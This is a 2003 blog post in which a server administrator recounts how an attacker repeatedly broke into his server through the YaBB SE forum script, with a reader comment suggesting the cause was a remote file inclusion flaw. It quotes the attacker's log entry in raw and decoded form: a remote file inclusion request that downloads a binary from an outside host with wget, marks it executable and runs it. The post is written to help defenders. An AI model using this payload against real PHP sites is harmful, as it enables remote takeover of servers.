Categorized | News

Interesting Hacking Ideas

Posted on 28 October 2003 by Demian Turner

In recent months I’ve attracted the attentions of a hacker from Brazil, and until a few days ago this proved to be a real pain in the ass, especially as the exploit he was using doesn’t seem to be widely documented on the web.

Finally I managed to close the hole, but after I had tried all the following:

  • shutdown all non-essential services on RH 7.3
  • shutdown FTP
  • reset all passwords
  • removed GCC from my system as the hacker was gaining access and compiling further C exploits
  • almost having had to change machines!

I was still getting compromised.  At first I thought this bastard was just a bot that automatically detected a security hole and was sending automated attacks.  But recently looking at his .bash_history I realised I had a fairy persistent pest on my hands.

Anyways, the security hole ended up being quite simple, wished I had discovered it earlier.  Turns out one of my users was running the http://www.yabbse.org/ forum script, quite possibly one of the most insecure examples of professional PHP programming about.  I present the details here in the hope they will help some write more secure scripts.

The request that the hacker was using to compromise the server was the following:

[root@www logs]# cat access_log | grep spc1
200.138.46.149 – – [25/Oct/2003:16:43:42 -0700] “GET /fishbowl/Sources/Packages.php?
sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir%20/var/tmp/.xpl;%20cd%20/var/tmp/.xpl;
%20wget%20http://brlink.net/db/spc1;%20chmod%20777%20spc1;%20./spc1 HTTP/1.1″ 200
255 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)”

Put through a little urldecode you get:

/fishbowl/Sources/Packages.php?sourcedir=http://brlink.net/db/cat.txt?&cmd=mkdir
/var/tmp/.xpl; cd /var/tmp/.xpl; wget http://brlink.net/db/spc1; chmod 777 spc1; ./spc1

Check out the cat.txt, it’s an interesting idea.  Looks like yabbse script presented a nice exec() or system() call for anyone to do what they wanted with.  I would estimate PHP programmers learn to treat these functions with caution within their first 3 months of exposure to the language, that’s if they have no prior development experience.  What’s strange is that yabbsee, currently in version 1.5.4 with quite a professional website, let this *censored*up slip through.

Many thanks to  Nick Rembis who pointed me in the right direction to closing this hole.

Bookmark and Share

2 Comments For This Post

  1. jrust Says:

    Seems more likely that the hole was a fopen() or include() or require() statement (since the exploited variable was sourcedir). That\’s a common exploit (that got my website once) since the default setting is to allow urls to be opened and executed as if they were being run on the exploited webserver. You may consider turning allow_url_fopen (http://us4.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen) off if you don\’t need it as it\’s often hard to analyze everyt instance of those methods.

  2. demian Says:

    Hi Jason

    Thanks for pointing this out, lost so much time with the hack I couldn\’t be bothered to look at the code. Will check it out 😉

    cheers

    Demian

Leave a Reply

Categories

Books

Demian Turner's currently-reading book recommendations, reviews, favorite quotes, book clubs, book trivia, book lists

Facebook